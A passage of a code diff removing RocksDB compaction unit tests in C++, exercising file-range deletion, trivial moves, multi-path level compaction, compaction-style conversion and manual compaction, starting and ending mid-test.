-    ASSERT_LE(SizeAtLevel(i), target_size);
-    target_size = static_cast<uint64_t>(target_size *
-                                        options.max_bytes_for_level_multiplier);
-  }
-
-  TEST_SYNC_POINT("DBCompaction::PartialFill:2");
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  threads.join();
-
-  for (int32_t i = 0; i < 4300; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-}
-
-TEST_F(DBCompactionTest, DeleteFileRange) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 10 * 1024 * 1024;
-  options.max_bytes_for_level_multiplier = 2;
-  options.num_levels = 4;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 3;
-
-  DestroyAndReopen(options);
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  // Add 2 non-overlapping files
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-
-  // file 1 [0 => 100]
-  for (int32_t i = 0; i < 100; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // file 2 [100 => 300]
-  for (int32_t i = 100; i < 300; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // 2 files in L0
-  ASSERT_EQ("2", FilesPerLevel(0));
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 2;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  // 2 files in L2
-  ASSERT_EQ("0,0,2", FilesPerLevel(0));
-
-  // file 3 [ 0 => 200]
-  for (int32_t i = 0; i < 200; i++) {
-    values[i] = RandomString(&rnd, value_size);
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  // Many files 4 [300 => 4300)
-  for (int32_t i = 0; i <= 5; i++) {
-    for (int32_t j = 300; j < 4300; j++) {
-      if (j == 2300) {
-        ASSERT_OK(Flush());
-        dbfull()->TEST_WaitForFlushMemTable();
-      }
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-  }
-  ASSERT_OK(Flush());
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Verify level sizes
-  uint64_t target_size = 4 * options.max_bytes_for_level_base;
-  for (int32_t i = 1; i < options.num_levels; i++) {
-    ASSERT_LE(SizeAtLevel(i), target_size);
-    target_size = static_cast<uint64_t>(target_size *
-                                        options.max_bytes_for_level_multiplier);
-  }
-
-  size_t old_num_files = CountFiles();
-  std::string begin_string = Key(1000);
-  std::string end_string = Key(2000);
-  Slice begin(begin_string);
-  Slice end(end_string);
-  ASSERT_OK(DeleteFilesInRange(db_, db_->DefaultColumnFamily(), &begin, &end));
-
-  int32_t deleted_count = 0;
-  for (int32_t i = 0; i < 4300; i++) {
-    if (i < 1000 || i > 2000) {
-      ASSERT_EQ(Get(Key(i)), values[i]);
-    } else {
-      ReadOptions roptions;
-      std::string result;
-      Status s = db_->Get(roptions, Key(i), &result);
-      ASSERT_TRUE(s.IsNotFound() || s.ok());
-      if (s.IsNotFound()) {
-        deleted_count++;
-      }
-    }
-  }
-  ASSERT_GT(deleted_count, 0);
-  begin_string = Key(5000);
-  end_string = Key(6000);
-  Slice begin1(begin_string);
-  Slice end1(end_string);
-  // Try deleting files in range which contain no keys
-  ASSERT_OK(
-      DeleteFilesInRange(db_, db_->DefaultColumnFamily(), &begin1, &end1));
-
-  // Push data from level 0 to level 1 to force all data to be deleted
-  // Note that we don't delete level 0 files
-  compact_options.change_level = true;
-  compact_options.target_level = 1;
-  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr));
-
-  ASSERT_OK(
-      DeleteFilesInRange(db_, db_->DefaultColumnFamily(), nullptr, nullptr));
-
-  int32_t deleted_count2 = 0;
-  for (int32_t i = 0; i < 4300; i++) {
-    ReadOptions roptions;
-    std::string result;
-    Status s = db_->Get(roptions, Key(i), &result);
-    ASSERT_TRUE(s.IsNotFound());
-    deleted_count2++;
-  }
-  ASSERT_GT(deleted_count2, deleted_count);
-  size_t new_num_files = CountFiles();
-  ASSERT_GT(old_num_files, new_num_files);
-}
-
-TEST_P(DBCompactionTestWithParam, TrivialMoveToLastLevelWithFiles) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  Random rnd(301);
-  std::vector<std::string> values;
-  // File with keys [ 0 => 99 ]
-  for (int i = 0; i < 100; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1", FilesPerLevel(0));
-  // Compaction will do L0=>L1 (trivial move) then move L1 files to L3
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 3;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,1", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  // File with keys [ 100 => 199 ]
-  for (int i = 100; i < 200; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1,0,0,1", FilesPerLevel(0));
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-  // Compaction will do L0=>L1 L1=>L2 L2=>L3 (3 trivial moves)
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,2", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 4);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  for (int i = 0; i < 200; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, LevelCompactionThirdPath) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 500 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_2", 4 * 1024 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_3", 1024 * 1024 * 1024);
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 4;
-  options.max_bytes_for_level_base = 400 * 1024;
-  options.max_subcompactions = max_subcompactions_;
-  //  options = CurrentOptions(options);
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(options.db_paths[1].path, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(options.db_paths[1].path + "/" + filenames[i]);
-  }
-  env_->DeleteDir(options.db_paths[1].path);
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are not going to second path.
-  // After that, (100K, 200K)
-  for (int num = 0; num < 3; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  // Another 110KB triggers a compaction to 400K file to fill up first path
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(3, GetSstFileCount(options.db_paths[1].path));
-
-  // (1, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4", FilesPerLevel(0));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 1)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,1", FilesPerLevel(0));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 2)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,2", FilesPerLevel(0));
-  ASSERT_EQ(2, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 3)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,3", FilesPerLevel(0));
-  ASSERT_EQ(3, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,4", FilesPerLevel(0));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 5)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,5", FilesPerLevel(0));
-  ASSERT_EQ(5, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 6)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,6", FilesPerLevel(0));
-  ASSERT_EQ(6, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 7)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,7", FilesPerLevel(0));
-  ASSERT_EQ(7, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 4, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,8", FilesPerLevel(0));
-  ASSERT_EQ(8, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(4, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_P(DBCompactionTestWithParam, LevelCompactionPathUse) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 500 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_2", 4 * 1024 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_3", 1024 * 1024 * 1024);
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 4;
-  options.max_bytes_for_level_base = 400 * 1024;
-  options.max_subcompactions = max_subcompactions_;
-  //  options = CurrentOptions(options);
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(options.db_paths[1].path, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(options.db_paths[1].path + "/" + filenames[i]);
-  }
-  env_->DeleteDir(options.db_paths[1].path);
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // Always gets compacted into 1 Level1 file,
-  // 0/1 Level 0 file
-  for (int num = 0; num < 3; num++) {
-    key_idx = 0;
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  key_idx = 0;
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,1", FilesPerLevel(0));
-  ASSERT_EQ(0, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_P(DBCompactionTestWithParam, ConvertCompactionStyle) {
-  Random rnd(301);
-  int max_key_level_insert = 200;
-  int max_key_universal_insert = 600;
-
-  // Stage 1: generate a db with level compaction
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.num_levels = 4;
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_bytes_for_level_base = 500 << 10;  // 500KB
-  options.max_bytes_for_level_multiplier = 1;
-  options.target_file_size_base = 200 << 10;  // 200KB
-  options.target_file_size_multiplier = 1;
-  options.max_subcompactions = max_subcompactions_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  for (int i = 0; i <= max_key_level_insert; i++) {
-    // each value is 10K
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-  }
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(TotalTableFiles(1, 4), 1);
-  int non_level0_num_files = 0;
-  for (int i = 1; i < options.num_levels; i++) {
-    non_level0_num_files += NumTableFilesAtLevel(i, 1);
-  }
-  ASSERT_GT(non_level0_num_files, 0);
-
-  // Stage 2: reopen with universal compaction - should fail
-  options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 1;
-  options = CurrentOptions(options);
-  Status s = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(s.IsInvalidArgument());
-
-  // Stage 3: compact into a single file and move the file to level 0
-  options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.target_file_size_base = INT_MAX;
-  options.target_file_size_multiplier = 1;
-  options.max_bytes_for_level_base = INT_MAX;
-  options.max_bytes_for_level_multiplier = 1;
-  options.num_levels = 4;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 0;
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kForce;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  dbfull()->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-
-  // Only 1 file in L0
-  ASSERT_EQ("1", FilesPerLevel(1));
-
-  // Stage 4: re-open in universal compaction style and do some db operations
-  options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 4;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 3;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  options.num_levels = 1;
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  for (int i = max_key_level_insert / 2; i <= max_key_universal_insert; i++) {
-    ASSERT_OK(Put(1, Key(i), RandomString(&rnd, 10000)));
-  }
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  for (int i = 1; i < options.num_levels; i++) {
-    ASSERT_EQ(NumTableFilesAtLevel(i, 1), 0);
-  }
-
-  // verify keys inserted in both level compaction style and universal
-  // compaction style
-  std::string keys_in_db;
-  Iterator* iter = dbfull()->NewIterator(ReadOptions(), handles_[1]);
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    keys_in_db.append(iter->key().ToString());
-    keys_in_db.push_back(',');
-  }
-  delete iter;
-
-  std::string expected_keys;
-  for (int i = 0; i <= max_key_universal_insert; i++) {
-    expected_keys.append(Key(i));
-    expected_keys.push_back(',');
-  }
-
-  ASSERT_EQ(keys_in_db, expected_keys);
-}
-
-TEST_F(DBCompactionTest, L0_CompactionBug_Issue44_a) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "b", "v"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_OK(Delete(1, "b"));
-    ASSERT_OK(Delete(1, "a"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_OK(Delete(1, "a"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "a", "v"));
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("(a->v)", Contents(1));
-    env_->SleepForMicroseconds(1000000);  // Wait for compaction to finish
-    ASSERT_EQ("(a->v)", Contents(1));
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBCompactionTest, L0_CompactionBug_Issue44_b) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    Put(1, "", "");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Delete(1, "e");
-    Put(1, "", "");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "c", "cv");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "", "");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "", "");
-    env_->SleepForMicroseconds(1000000);  // Wait for compaction to finish
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "d", "dv");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Put(1, "", "");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    Delete(1, "d");
-    Delete(1, "b");
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("(->)(c->cv)", Contents(1));
-    env_->SleepForMicroseconds(1000000);  // Wait for compaction to finish
-    ASSERT_EQ("(->)(c->cv)", Contents(1));
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBCompactionTest, ManualAutoRace) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::BGWorkCompaction", "DBCompactionTest::ManualAutoRace:1"},
-       {"DBImpl::RunManualCompaction:WaitScheduled",
-        "BackgroundCallCompaction:0"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Put(1, "foo", "");
-  Put(1, "bar", "");
-  Flush(1);
-  Put(1, "foo", "");
-  Put(1, "bar", "");
-  // Generate four files in CF 0, which should trigger an auto compaction
-  Put("foo", "");
-  Put("bar", "");
-  Flush();
-  Put("foo", "");
-  Put("bar", "");
-  Flush();
-  Put("foo", "");
-  Put("bar", "");
-  Flush();
-  Put("foo", "");
-  Put("bar", "");
-  Flush();
-
-  // The auto compaction is scheduled but waited until here
-  TEST_SYNC_POINT("DBCompactionTest::ManualAutoRace:1");
-  // The auto compaction will wait until the manual compaction is registerd
-  // before processing so that it will be cancelled.
-  dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr, nullptr);
-  ASSERT_EQ("0,1", FilesPerLevel(1));
-
-  // Eventually the cancelled compaction will be rescheduled and executed.
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, ManualCompaction) {
-  Options options = CurrentOptions();
-  options.max_subcompactions = max_subcompactions_;
-  options.statistics = rocksdb::CreateDBStatistics();
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // iter - 0 with 7 levels
-  // iter - 1 with 3 levels
-  for (int iter = 0; iter < 2; ++iter) {
-    MakeTables(3, "p", "q", 1);
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range falls before files
-    Compact(1, "", "c");
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range falls after files
-    Compact(1, "r", "z");
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range overlaps files
-    Compact(1, "p1", "p9");
-    ASSERT_EQ("0,0,1", FilesPerLevel(1));
-
-    // Populate a different range
-    MakeTables(3, "c", "e", 1);
-    ASSERT_EQ("1,1,2", FilesPerLevel(1));
-
-    // Compact just the new range
-    Compact(1, "b", "f");
-    ASSERT_EQ("0,0,2", FilesPerLevel(1));
-
-    // Compact all
-    MakeTables(1, "a", "z", 1);
-    ASSERT_EQ("1,0,2", FilesPerLevel(1));
-
-    uint64_t prev_block_cache_add =
-        options.statistics->getTickerCount(BLOCK_CACHE_ADD);
-    CompactRangeOptions cro;
-    cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-    db_->CompactRange(cro, handles_[1], nullptr, nullptr);
-    // Verify manual compaction doesn't fill block cache
-    ASSERT_EQ(prev_block_cache_add,
-              options.statistics->getTickerCount(BLOCK_CACHE_ADD));
-
-    ASSERT_EQ("0,0,1", FilesPerLevel(1));
-
-    if (iter == 0) {
-      options = CurrentOptions();
-      options.num_levels = 3;
-      options.create_if_missing = true;
-      options.statistics = rocksdb::CreateDBStatistics();
-      DestroyAndReopen(options);
-      CreateAndReopenWithCF({"pikachu"}, options);
-    }
-  }
-}
-
-
-TEST_P(DBCompactionTestWithParam, ManualLevelCompactionOutputPathId) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_ + "_2", 2 * 10485760);
-  options.db_paths.emplace_back(dbname_ + "_3", 100 * 10485760);
-  options.db_paths.emplace_back(dbname_ + "_4", 120 * 10485760);
-  options.max_subcompactions = max_subcompactions_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // iter - 0 with 7 levels
-  // iter - 1 with 3 levels
-  for (int iter = 0; iter < 2; ++iter) {
-    for (int i = 0; i < 3; ++i) {
-      ASSERT_OK(Put(1, "p", "begin"));
-      ASSERT_OK(Put(1, "q", "end"));
-      ASSERT_OK(Flush(1));
-    }
-    ASSERT_EQ("3", FilesPerLevel(1));
-    ASSERT_EQ(3, GetSstFileCount(options.db_paths[0].path));
-    ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-    // Compaction range falls before files
-    Compact(1, "", "c");
-    ASSERT_EQ("3", FilesPerLevel(1));
-
-    // Compaction range falls after files
-    Compact(1, "r", "z");
-    ASSERT_EQ("3", FilesPerLevel(1));
-
-    // Compaction range overlaps files
-    Compact(1, "p1", "p9", 1);
-    ASSERT_EQ("0,1", FilesPerLevel(1));
-    ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-    ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-    ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-    // Populate a different range
-    for (int i = 0; i < 3; ++i) {
-      ASSERT_OK(Put(1, "c", "begin"));
-      ASSERT_OK(Put(1, "e", "end"));
-      ASSERT_OK(Flush(1));
-    }
-    ASSERT_EQ("3,1", FilesPerLevel(1));
-
-    // Compact just the new range
-    Compact(1, "b", "f", 1);
-    ASSERT_EQ("0,2", FilesPerLevel(1));
-    ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-    ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-    ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-    // Compact all
-    ASSERT_OK(Put(1, "a", "begin"));
-    ASSERT_OK(Put(1, "z", "end"));
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ("1,2", FilesPerLevel(1));
-    ASSERT_EQ(2, GetSstFileCount(options.db_paths[1].path));
-    ASSERT_EQ(1, GetSstFileCount(options.db_paths[0].path));
-    CompactRangeOptions compact_options;
-    compact_options.target_path_id = 1;
-    compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-    db_->CompactRange(compact_options, handles_[1], nullptr, nullptr);
-
-    ASSERT_EQ("0,1", FilesPerLevel(1));
-    ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-    ASSERT_EQ(0, GetSstFileCount(options.db_paths[0].path));
-    ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-    if (iter == 0) {
-      DestroyAndReopen(options);
-      options = CurrentOptions();
-      options.db_paths.emplace_back(dbname_ + "_2", 2 * 10485760);
-      options.db_paths.emplace_back(dbname_ + "_3", 100 * 10485760);
-      options.db_paths.emplace_back(dbname_ + "_4", 120 * 10485760);
-      options.max_background_flushes = 1;
-      options.num_levels = 3;
-      options.create_if_missing = true;
-      CreateAndReopenWithCF({"pikachu"}, options);
-    }
-  }
-}
-
-TEST_F(DBCompactionTest, FilesDeletedAfterCompaction) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v2"));
-    Compact(1, "a", "z");
-    const size_t num_files = CountLiveFiles();
-    for (int i = 0; i < 10; i++) {
-      ASSERT_OK(Put(1, "foo", "v2"));
-      Compact(1, "a", "z");
-    }
-    ASSERT_EQ(CountLiveFiles(), num_files);
-  } while (ChangeCompactOptions());
-}
-
-// Check level comapction with compact files
-TEST_P(DBCompactionTestWithParam, DISABLED_CompactFilesOnLevelCompaction) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 100;
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base = options.target_file_size_base * 2;
-  options.level0_stop_writes_trigger = 2;
-  options.max_bytes_for_level_multiplier = 2;
-  options.compression = kNoCompression;
